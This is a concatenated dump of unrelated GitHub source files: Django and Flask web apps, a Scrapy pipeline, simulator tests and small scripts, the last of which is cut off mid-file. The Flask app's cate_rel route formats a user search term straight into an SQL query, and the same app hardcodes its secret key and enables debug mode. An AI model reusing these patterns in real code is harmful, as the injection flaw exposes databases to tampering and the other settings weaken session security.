related_instance):\n \"\"\"If related_models is set, define how to retrieve the Car instance(s) from the related model.\n The related_models option should be used with caution because it can lead in the index\n to the updating of a lot of items.\n \"\"\"\n if isinstance(related_instance, Author):\n return related_instance.lectures_author.all()\n elif isinstance(related_instance, Event):\n return related_instance.lectures.all()\n elif isinstance(related_instance, Category):\n return related_instance.lectures.all()\n\n\n@registry.register_document\nclass AuthorDocument(Document):\n name = fields.TextField(\n analyzer=eng_analyzer,\n )\n\n class Index:\n # Name of the Elasticsearch index\n name = 'authors'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Author # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'views',\n 'id',\n #'name',\n ]\n\n\n@registry.register_document\nclass CategoryDocument(Document):\n class Index:\n # Name of the Elasticsearch index\n name = 'categories'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Category # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'id',\n 'name',\n 'image',\n ]\n\n\n@registry.register_document\nclass EventDocument(Document):\n title = fields.TextField(\n analyzer=eng_analyzer,\n )\n description = fields.TextField(\n analyzer=eng_analyzer,\n )\n caption = fields.TextField(\n analyzer=eng_analyzer,\n )\n class Index:\n # Name of the Elasticsearch index\n name = 'events'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Event # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'id',\n #'title',\n #'description',\n #'caption',\n 'image',\n 'date'\n ]\n","repo_name":"gregpr07/VLN-Mobile","sub_path":"backend/esearch/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3167737684","text":"from flask import Flask, render_template, request, jsonify, make_response, redirect, session\nfrom neo_db.query_graph import query, get_KGQA_answer, get_answer_profile, query_path, get_answer_all_profile, \\\n query_branch, all, fuzzy_search\nfrom KGQA.ltp import get_target_array,get_fuzzy_array\nfrom neo_db.update import update_node, add_node, delete_node\nfrom kg_data.data_processing import get_data_num\nfrom kg_data.data_show import get_train_data_list\nfrom mysql_db.data_show import cate_rel_show, operation\nfrom flask_session import Session\nimport numpy as np\nimport pandas as pd\nimport csv\nimport os\nimport datetime\nimport json\n\napp = Flask(__name__)\n# app.config['SECRET_KEY'] = os.urandom(24)\napp.secret_key = 'beifang changjian de keke ....'\n\n\n# Session(app)\n\n@app.route('/', methods=['GET', 'POST'])\n# @app.route('/index', methods=['GET', 'POST'])\ndef first(name=None):\n return render_template('first.html', name=name)\n\n\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/search.html', methods=['GET', 'POST'])\ndef search():\n return render_template('search.html')\n\n\n@app.route('/KGQA.html', methods=['GET', 'POST'])\ndef KGQA():\n return render_template('KGQA.html')\n\n\n@app.route('/get_profile', methods=['GET', 'POST'])\ndef get_profile():\n name = request.args.get('character_name')\n json_data = get_answer_profile(name)\n return jsonify(json_data)\n\n\n# all_relation.html所使用\n@app.route('/get_all_profile', methods=['GET', 'POST'])\ndef get_all_profile():\n name = request.args.get('character_name')\n # cate = request.args.get('cate')\n json_data = get_answer_all_profile(name)\n return jsonify(json_data)\n\n\n@app.route('/all_node', methods=['GET', 'POST'])\ndef all_node():\n json_data, name_dict = all()\n session['name_dict'] = name_dict\n return jsonify(json_data)\n\n\n@app.route('/search_a_node', methods=['GET', 'POST'])\ndef search_a_node():\n name = request.args.get('name')\n id = session.get('name_dict')[name]\n json_data = {'id': id}\n return jsonify(json_data)\n\n\n@app.route('/KGQA_answer', methods=['GET', 'POST'])\ndef KGQA_answer():\n question = request.args.get('name')\n target_array = get_target_array(str(question))\n if len(target_array) == 1:\n json_data = query(str(target_array[0]))\n elif len(target_array) == 0:\n json_data = query(question)\n else:\n json_data = get_KGQA_answer(target_array)\n return jsonify(json_data)\n\n\n@app.route('/KGQA_fuzzy', methods=['GET', 'POST'])\ndef KGQA_fuzzy():\n question = request.args.get('name')\n target_array = get_fuzzy_array(question)\n # print(f\"tar {target_array}\")\n json_data = fuzzy_search(target_array)\n # print(f\"js {json_data}\")\n return jsonify(json_data)\n\n\n# 知识点检索\n@app.route('/search_name', methods=['GET', 'POST'])\ndef search_name():\n name = request.args.get('name')\n json_data = query(str(name))\n return jsonify(json_data)\n\n\n# 多度查询,分支检索\n@app.route('/search_branch', methods=['GET', 'POST'])\ndef search_branch():\n name = request.args.get('name')\n print(name)\n deep = request.args.get('deep')\n print(deep)\n json_data = query_branch(str(name), deep)\n return jsonify(json_data)\n\n\n# 查询最短路径\n@app.route('/search_path', methods=['GET', 'POST'])\ndef search_path():\n a = request.args.get('a')\n b = request.args.get('b')\n json_data = query_path(str(a), str(b))\n return jsonify(json_data)\n\n\n## Neo4j数据库增删改查\n# 改变节点概念级别\n@app.route('/change_node', methods=['GET', 'POST'])\ndef change_node():\n node = request.args.get('node')\n cate = request.args.get('cate')\n update_node(node, cate)\n return render_template('all_relation.html')\n # json_data = update_node(str(node), str(cate))\n # return jsonify(json_data)\n\n\n# 添加一条关系\n@app.route('/add_Node', methods=['GET', 'POST'])\ndef add_Node():\n e1 = request.form.get('e1')\n e2 = request.form.get('e2')\n rel = request.form.get('rel')\n c1 = request.form.get('c1')\n c2 = request.form.get('c2')\n add_node(e1, e2, rel, c1, c2)\n # print(message)\n # print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/all_relation.html')\n\n\n# 删除一个节点\n@app.route('/delete_aNode', methods=['GET', 'POST'])\ndef delete_aNode():\n name = request.args.get('node')\n delete_node(name)\n return redirect('/all_relation.html')\n\n\n@app.route('/all_relation.html', methods=['GET', 'POST'])\ndef get_all_relation():\n return render_template('all_relation.html')\n\n\n# --------------------------part-------------------------------\n# --------------------------part-------------------------------\n@app.route('/graph.html', methods=['GET', 'POST'])\ndef graph():\n return render_template('part/graph.html')\n\n\n@app.route('/linear.html', methods=['GET', 'POST'])\ndef linear():\n return render_template('part/linear.html')\n\n\n@app.route('/stack.html', methods=['GET', 'POST'])\ndef stack():\n return render_template('part/stack.html')\n\n\n@app.route('/queue.html', methods=['GET', 'POST'])\ndef queue():\n return render_template('part/queue.html')\n\n\n@app.route('/string.html', methods=['GET', 'POST'])\ndef string():\n return render_template('part/string.html')\n\n\n@app.route('/array.html', methods=['GET', 'POST'])\ndef array():\n return render_template('part/array.html')\n\n\n@app.route('/lists.html', methods=['GET', 'POST'])\ndef lists():\n return render_template('part/lists.html')\n\n\n@app.route('/tree.html', methods=['GET', 'POST'])\ndef tree():\n return render_template('part/tree.html')\n\n\n@app.route('/searching.html', methods=['GET', 'POST'])\ndef searching():\n return render_template('part/searching.html')\n\n\n@app.route('/sorting.html', methods=['GET', 'POST'])\ndef sorting():\n return render_template('part/sorting.html')\n\n\n# -------------------------other------------------------------\n# -------------------------other------------------------------\n@app.route('/search_path.html', methods=['GET', 'POST'])\ndef search_path1():\n return render_template('search_path.html')\n\n\n# -------------------------data_show------------------------------\n# -------------------------data_show------------------------------\n@app.route('/cate_rel', methods=['GET', 'POST'])\ndef cate_rel():\n \"\"\"请求的数据源,该函数将数据库中存储的数据,返回以下这种数据的列表:\n {'name': '香蕉', 'id': 1, 'price': '10'}\n {'name': '苹果', 'id': 2, 'price': '10'}\n \"\"\"\n # data = cate_rel_show()\n\n # if request.method == 'POST':\n # print('post')\n # if request.method == 'GET':\n # info = request.values\n # limit = info.get('limit', 10) # 每页显示的条数\n # offset = info.get('offset', 0) # 分片数,(页码-1)*limit,它表示一段数据的起点\n # print('get', limit)\n # print('get offset', offset)\n\n name = request.args.get('search_kw')\n if name:\n print(name)\n sql = \"select * from cate_rel where e1 like '%{0}%' or e2 like '%{0}%' or rel like '%{0}%' or c1 like '%{0}%' or c2 like '%{0}%'\".format(\n name)\n else:\n sql = 'SELECT * FROM cate_rel'\n data = cate_rel_show(sql)\n return jsonify(data)\n # return jsonify({'total': len(data), 'rows': data[int(offset):(int(offset) + int(limit))]})\n # 注意total与rows是必须的两个参数,名字不能写错,total是数据的总长度,rows是每页要显示的数据,它是一个列表\n # 前端根本不需要指定total和rows这俩参数,他们已经封装在了bootstrap table里了\n\n\n# 添加一条记录\n@app.route('/add_item', methods=['GET', 'POST'])\ndef add_item():\n e1 = request.form.get('e1')\n e2 = request.form.get('e2')\n rel = request.form.get('rel')\n c1 = request.form.get('c1')\n c2 = request.form.get('c2')\n item = [e1, e2, rel, c1, c2]\n sql = 'insert cate_rel (e1, e2, rel, c1, c2)VALUES (%s, %s, %s, %s, %s)'\n operation(sql, item)\n print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/data_show.html')\n\n\n# 更新一条记录\n@app.route('/update_item', methods=['GET', 'POST'])\ndef update_item():\n cate_rel_id = request.form.get('cate_rel_id')\n e1 = request.form.get('update_e1')\n e2 = request.form.get('update_e2')\n rel = request.form.get('update_rel')\n c1 = request.form.get('update_c1')\n c2 = request.form.get('update_c2')\n item = [e1, e2, rel, c1, c2, cate_rel_id]\n # print(item)\n sql = 'update cate_rel set e1 = %s, e2 = %s, rel = %s, c1 = %s, c2 = %s where cate_rel_id = %s'\n\n operation(sql, item)\n print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/data_show.html')\n\n\n# 删除一条记录\n@app.route('/delete_item', methods=['GET', 'POST'])\ndef delete_item():\n cate_rel_id = request.args.get(\"id\")\n cate_rel_id = int(cate_rel_id)\n print(cate_rel_id)\n item = [cate_rel_id]\n sql = 'delete from cate_rel where cate_rel_id = \"%s\"'\n operation(sql, item)\n return redirect('/data_show.html')\n\n\n@app.route('/data_show.html', methods=['GET', 'POST'])\ndef data_show():\n # train_data_list = get_train_data_list('/kg_data/cate.csv')\n return render_template('data_show/data_show.html')\n\n\n@app.route('/cate.html', methods=['GET', 'POST'])\ndef cate():\n train_data_list = get_train_data_list('/kg_data/cate.csv')\n return render_template('data_show/cate.html', train_data_list=train_data_list)\n\n\n@app.route('/relation.html', methods=['GET', 'POST'])\ndef relation():\n train_data_list = get_train_data_list('/kg_data/relation.csv')\n return render_template('data_show/relation.html', train_data_list=train_data_list)\n\n\n@app.route('/welcome.html', methods=['GET', 'POST'])\ndef welcome():\n relation, entity = get_data_num()\n return render_template('welcome.html', entity=entity, relation=relation)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"MayukeM/DataStructure_KG","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"22224337905","text":"import matplotlib.pyplot as plt\nimport sys\n\nx = []\ny = []\n\nfor line in sys.stdin:\n x.append(int(line.split(\",\")[0]))\n y.append(float(line.split(\",\")[1]))\n\nplt.plot(x,y)\nplt.xlabel('Message number')\nplt.ylabel('Response time in ms')\nplt.title(\"Response Time Analysis\")\nplt.show()","repo_name":"mayankmetha/sockets","sub_path":"analysis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36265866209","text":"import unittest\n\nfrom absl.testing import absltest\nimport numpy as np\nfrom putting_dune import constants\nfrom putting_dune import geometry\nfrom putting_dune import goals\nfrom putting_dune import graphene\nfrom putting_dune import microscope_utils\nfrom putting_dune import simulator\n\n\nclass SingleSiliconGoalReachingTest(absltest.TestCase):\n\n def setUp(self):\n super().setUp()\n self.rng = np.random.default_rng(0)\n self.goal = goals.SingleSiliconGoalReaching()\n # Make a small graphene sheet to more thoroughly test what happens\n # at the edge of a graphene sheet.\n self.material = graphene.PristineSingleDopedGraphene(grid_columns=50)\n self.sim = simulator.PuttingDuneSimulator(self.material)\n\n def test_goal_position_is_set_to_a_lattice_position(self):\n # Reset several times to check it's always a lattice position.\n for _ in range(10):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # We don't need all 3 nearest neighbors, but this function\n # is convenient to use.\n neighbor_distances = geometry.nearest_neighbors3(\n self.material.grid.atom_positions,\n self.goal.goal_position_material_frame,\n include_self=True,\n ).neighbor_distances\n self.assertLess(neighbor_distances[0], 1e-3)\n\n def test_goal_position_is_not_set_near_an_edge(self):\n # This is enforced implicitly - the goal is an atom position within\n # the field of view, and the simulator initiates the silicon close to\n # the center of the simulated material.\n\n # Reset several times to check it's not near an edge.\n for _ in range(100):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # We look at the neighbor distances in the material frame.\n neighbor_distances = geometry.nearest_neighbors3(\n self.material.grid.atom_positions,\n self.goal.goal_position_material_frame,\n ).neighbor_distances\n self.assertLessEqual(\n neighbor_distances[-1],\n constants.CARBON_BOND_DISTANCE_ANGSTROMS + 1e-3,\n )\n\n @unittest.skip('The reward is now sparse. If we switch back, un-skip this.')\n def test_reward_increases_when_silicon_is_nearer_goal(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # Normally goals should be on the grid, but we can fake it for this test.\n silicon_position = self.material.get_silicon_position()\n closer_goal = silicon_position + np.asarray([5.0, 5.0], dtype=np.float32)\n further_goal = silicon_position + np.asarray([-8.0, 5.0], dtype=np.float32)\n\n self.goal.goal_position_material_frame = closer_goal\n closer_result = self.goal.calculate_reward_and_terminal(obs)\n self.goal.goal_position_material_frame = further_goal\n further_result = self.goal.calculate_reward_and_terminal(obs)\n\n self.assertGreater(closer_result.reward, further_result.reward)\n\n def test_returns_terminal_when_silicon_is_at_goal(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # Make an observation with the silicon at the goal position.\n silicon_position = graphene.get_silicon_positions(obs.grid)\n self.assertEqual(silicon_position.shape, (1, 2))\n obs = microscope_utils.MicroscopeObservation(\n # Put the silicon right in the center of the fov for convenience.\n grid=microscope_utils.AtomicGridMicroscopeFrame(\n microscope_utils.AtomicGrid(\n atom_positions=obs.grid.atom_positions - silicon_position + 0.5,\n atomic_numbers=obs.grid.atomic_numbers,\n )\n ),\n fov=microscope_utils.MicroscopeFieldOfView(\n lower_left=geometry.PointMaterialFrame(\n geometry.Point(self.goal.goal_position_material_frame - 10.0)\n ),\n upper_right=geometry.PointMaterialFrame(\n geometry.Point(self.goal.goal_position_material_frame + 10.0)\n ),\n ),\n controls=obs.controls,\n elapsed_time=obs.elapsed_time,\n )\n\n result = self.goal.calculate_reward_and_terminal(obs)\n\n self.assertTrue(result.is_terminal)\n\n def test_no_goals_within_1_angstrom(self):\n obs = self.sim.reset(self.rng)\n self.goal.goal_range_angstroms = (0.1, 1.0)\n\n with self.assertRaises(RuntimeError):\n self.goal.reset(self.rng, obs)\n\n def test_three_possible_goals_one_step_away(self):\n obs = self.sim.reset(self.rng)\n # 1.42 = 1 bond distance.\n self.goal.goal_range_angstroms = (1.40, 1.44)\n\n # Select a goal many times. We should see each goal at least once.\n observed_goal_positions = set()\n for _ in range(30):\n self.goal.reset(self.rng, obs)\n goal_position = self.goal.goal_position_material_frame.copy()\n observed_goal_positions.add(\n (round(goal_position[0], 5), round(goal_position[1], 5))\n )\n\n self.assertLen(observed_goal_positions, 3)\n\n def test_goal_reset_raises_error_if_no_silicon_is_found(self):\n obs = self.sim.reset(self.rng)\n obs.grid.atomic_numbers[:] = constants.CARBON\n\n with self.assertRaises(graphene.SiliconNotFoundError):\n self.goal.reset(self.rng, obs)\n\n def test_goal_calculate_raises_error_if_no_silicon_is_found(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n obs.grid.atomic_numbers[:] = constants.CARBON\n\n with self.assertRaises(graphene.SiliconNotFoundError):\n self.goal.calculate_reward_and_terminal(obs)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google/putting-dune","sub_path":"putting_dune/goals_test.py","file_name":"goals_test.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18764414169","text":"\"\"\"\nhttps://adventofcode.com/2020/day/10\n\"\"\"\n\n# Read input\nf = 'day-10/input.txt'\nwith open(f) as fp:\n adapters = [0] + sorted([int(x) for x in fp.read().split(\"\\n\")])\n\n# difference in joltage for paired adapters\ndeltas = [x-y for x, y in zip(adapters[1:], adapters[:-1])]\n\n# Problem 1: What is the number of 1-jolt differences multiplied by the number\n# of 3-jolt differences? Note that your device's built-in adapter has a joltage\n# 3 jolts higher than the highest-rated adapter.\nanswer = deltas.count(1) * (deltas.count(3)+1)\nprint(f'problem 1: {answer}')\n\n# Problem 2: What is the total number of distinct ways you can arrange the\n# adapters to connect the charging outlet to your device?\nadapters.remove(0)\nna = len(adapters)\npaths = [0 if x > 3 else 1 for x in adapters]\n\n# Compute the numbers of `paths` or unique adapter configurations which can\n# produce a given output joltage.\nfor i in range(na):\n j = i+1\n while (j < (na-1)) and ((adapters[j]-adapters[i]) <= 3):\n paths[j] += paths[i]\n j += 1\n\nprint(f'problem 2: {paths[-2]}')\n","repo_name":"jbburt/advent-of-code-20","sub_path":"day-10/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2419992856","text":"import sqlite3\nfrom .items import RestaurantItem, RestaurantInfoItem, RestaurantReviewItem\n\nclass TripadvisorPipeline(object):\n def __init__(self):\n self.create_connection()\n self.create_table()\n\n def create_connection(self):\n self.conn = sqlite3.connect(\"tripadvisor_restaurants.db\")\n self.curr = self.conn.cursor()\n\n def create_table(self):\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_table\"\"\")\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_info_table\"\"\")\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_review_table\"\"\")\n self.curr.execute(\"\"\"create table restaurant_table(\n id text,\n name text,\n restaurant_type text,\n restaurant_price text,\n restaurantid_fk text,\n page text\n )\"\"\")\n self.curr.execute(\"\"\"create table restaurant_info_table(\n id text,\n link text,\n coordinate text,\n image_url text,\n address text,\n phone_number text,\n review_count text,\n rate text,\n rate_food text,\n rate_service text,\n rate_atmosphere text,\n rate_value text,\n price_range text,\n cuisines text,\n meals text,\n special_diets text\n )\"\"\")\n self.curr.execute(\"\"\"create table restaurant_review_table(\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n name text,\n country text,\n rate text,\n date text,\n title text,\n content text,\n restaurantreview_fk text\n )\"\"\")\n\n def process_item(self, item, spider):\n if isinstance(item, RestaurantItem):\n self.store_restaurant(item)\n if isinstance(item, RestaurantInfoItem):\n self.store_restaurant_info(item)\n if isinstance(item, RestaurantReviewItem):\n self.store_restaurant_review(item)\n return item\n\n def store_restaurant(self, item):\n self.curr.execute(\"\"\"insert into restaurant_table values (?,?,?,?,?,?)\"\"\",(\n item['id'],\n item['name'],\n item['restaurant_type'],\n item['restaurant_price'],\n item['restaurantid_fk'],\n item['page']\n ))\n self.conn.commit()\n\n def store_restaurant_info(self, item):\n self.curr.execute(\"\"\"insert into restaurant_info_table values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",(\n item['id'],\n item['link'],\n item['coordinate'],\n item['image_url'],\n item['address'],\n item['phone_number'],\n item['review_count'],\n item['rate'],\n item['rate_food'],\n item['rate_service'],\n item['rate_atmosphere'],\n item['rate_value'],\n item['price_range'],\n item['cuisines'],\n item['meals'],\n item['special_diets']\n ))\n self.conn.commit()\n\n def store_restaurant_review(self, item):\n self.curr.execute(\"\"\"insert into restaurant_review_table values (?,?,?,?,?,?,?,?)\"\"\",(\n None,\n item['name'],\n item['country'],\n item['rate'],\n item['date'],\n item['title'],\n item['content'],\n item['restaurantreview_fk'],\n ))\n self.conn.commit()\n","repo_name":"tsadigov/tripadvisor_crawler","sub_path":"tripadvisor/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9012911247","text":"from django.shortcuts import render,redirect\nfrom django.views import View\nfrom django.contrib.auth.models import User\nfrom .models import Customer, Product, NewCollection, DiscountProduct, Cart, OrderPlaced,Review,Wishlist\nfrom .forms import SignUpForm,CustomerProfileForm,PasswordChangeForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import Count\nfrom django.urls import reverse\nfrom .forms import ReviewForm\nfrom django.utils import timezone\nimport json\nfrom django.http import HttpResponseRedirect\nfrom django.core.exceptions import ObjectDoesNotExist\nimport requests\nfrom sslcommerz_python.payment import SSLCSession\n\nfrom decimal import Decimal\nimport socket\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nfrom django.conf import settings\n#def home(request):\n# return render(request, 'app/home.html')\n\nclass ProductView(View):\n def get(self,request):\n totalitem=0\n products = Product.objects.all()\n Mobile = Product.objects.filter(category='M')\n Laptop = Product.objects.filter(category='L')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n context = {'products': products,'Mobile': Mobile,'Laptop': Laptop,'totalitem':totalitem}\n return render(request, 'app/home.html', context)\nclass MainProductView(View):\n def get(self,request):\n Mobile = Product.objects.filter(category='M')\n Laptop = Product.objects.filter(category='L')\n Camera = Product.objects.filter(category='C')\n Keyboards = Product.objects.filter(category='K')\n Mouse = Product.objects.filter(category='Mo')\n Desktops = Product.objects.filter(category='D')\n Pendrive = Product.objects.filter(category='P')\n\n context = {\n 'Mobile': Mobile,\n 'Laptop': Laptop,\n 'Camera': Camera,\n 'Keyboards': Keyboards,\n 'Mouse': Mouse,\n 'Desktops': Desktops,\n 'Pendrive': Pendrive,\n }\n \n return render(request, 'app/home.html', context)\n\n#def product_detail(request):\n# return render(request, 'app/productdetail.html')\n\nclass ProductDetailView(View):\n def get(self,request,pk):\n totalitem=0\n products = Product.objects.get(pk=pk)\n reviews = Review.objects.filter(product=products).order_by('-created_at')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/productdetail.html', {'products':products, 'reviews':reviews,'totalitem':totalitem})\nclass MainProductDetailView(View):\n def get(self,request,pk):\n products = Product.objects.get(pk=pk)\n return render(request, 'app/productdetail.html', {'products':products})\n@login_required\ndef add_to_cart(request):\n user = request.user\n product_id = request.GET.get('prod_id')\n product = Product.objects.get(id=product_id) # retrieve the Product instance\n if Cart.objects.filter(user=user, product=product).exists():\n messages.info(request, 'Product is already in your cart.')\n else:\n Cart(user=user, product=product).save()\n Wishlist.objects.filter(user=user, product=product).delete()\n return redirect( '/cart')\n \n@login_required\ndef show_cart(request):\n totalitem=0\n if request.user.is_authenticated:\n user=request.user\n cart=Cart.objects.filter(user=user)\n print(cart)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==user]\n print(cart_product)\n totalitem=len(Cart.objects.filter(user=request.user))\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n total = amount + shipping_amount\n\n return render(request, 'app/addtocart.html', {'carts': cart, 'total': total, 'amount': amount,'totalitem':totalitem})\n\n else:\n return render(request, 'app/emptycart.html')\ndef plus_cart(request):\n if request.method =='GET':\n \n prod_id=request.GET['prod_id']\n print(prod_id)\n c=Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n c.quantity+=1\n c.save()\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n data={\n 'quantity':c.quantity,\n 'amount':amount,\n 'total':total\n }\n return JsonResponse(data)\ndef minus_cart(request):\n if request.method =='GET':\n prod_id = request.GET['prod_id']\n print(prod_id)\n c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n if c.quantity > 1: # Check if quantity is greater than 1\n c.quantity -= 1\n c.save()\n disable_minus_button = False # Enable minus button after decrement\n else:\n disable_minus_button = True # Disable minus button when quantity is 1\n amount = 0.0\n shipping_amount = 100.0\n total = 0.0\n cart_product = [p for p in Cart.objects.all() if p.user == request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n \n if c.quantity == 0:\n shipping_amount = 0.0\n\n total = amount + shipping_amount\n data = {\n 'quantity': c.quantity,\n 'amount': amount,\n 'total': total,\n 'disable_minus_button': disable_minus_button\n }\n return JsonResponse(data)\n\n\ndef remove_cart(request):\n if request.method =='GET':\n \n prod_id=request.GET['prod_id']\n print(prod_id)\n c=Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n \n c.delete()\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n total = amount + shipping_amount\n data={\n \n 'amount':amount,\n 'total':total\n }\n return JsonResponse(data)\n\n\ndef buy_now(request):\n return render(request, 'app/buynow.html')\n\n#def profile(request):\n# return render(request, 'app/profile.html')\n@login_required\ndef address(request):\n totalitem=0\n add=Customer.objects.filter(user=request.user)\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/address.html',{'add':add,'active':'btn-primary','totalitem':totalitem})\n@login_required\ndef orders(request):\n totalitem=0\n op=OrderPlaced.objects.filter(user=request.user)\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n\n return render(request, 'app/orders.html',{'order_placed':op,'totalitem':totalitem})\n\n\ndef mobile(request, data=None):\n totalitem=0\n mobile = None\n \n if data is None:\n mobile = Product.objects.filter(category='M')\n elif data == 'below': \n mobile = Product.objects.filter(category='M', selling_price__lt=20000)\n elif data == 'above': \n mobile = Product.objects.filter(category='M', selling_price__gte=20000)\n else:\n mobile = Product.objects.filter(category='M', brand=data)\n \n paginator = Paginator(mobile, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='M').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/mobile.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\n\ndef laptop(request, data=None):\n totalitem=0\n laptop = None\n \n if data is None:\n laptop = Product.objects.filter(category='L')\n elif data == 'below': \n laptop = Product.objects.filter(category='L', selling_price__lt=70000)\n elif data == 'above': \n laptop = Product.objects.filter(category='L', selling_price__gte=70000)\n else:\n laptop = Product.objects.filter(category='L', brand=data)\n \n paginator = Paginator(laptop, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='L').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/laptop.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\n\n\ndef camera(request, data=None):\n totalitem=0\n camera = None\n \n if data is None:\n camera = Product.objects.filter(category='C')\n elif data == 'below': \n camera = Product.objects.filter(category='C', selling_price__lt=30000)\n elif data == 'above': \n camera = Product.objects.filter(category='C', selling_price__gte=30000)\n else:\n camera = Product.objects.filter(category='C', brand=data)\n \n paginator = Paginator(camera, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='C').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/camera.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\ndef grocery(request, data=None):\n totalitem=0\n grocery = None\n \n if data is None:\n grocery = Product.objects.filter(category='G')\n elif data == 'below': \n grocery = Product.objects.filter(category='G', selling_price__lt=2000)\n elif data == 'above': \n grocery = Product.objects.filter(category='G', selling_price__gte=2000)\n else:\n grocery = Product.objects.filter(category='G', brand=data)\n \n paginator = Paginator(grocery, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='G').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/grocery.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\ndef cloth(request, data=None):\n totalitem=0\n cloth = None\n \n if data is None:\n cloth = Product.objects.filter(category='Cl')\n elif data == 'below': \n cloth = 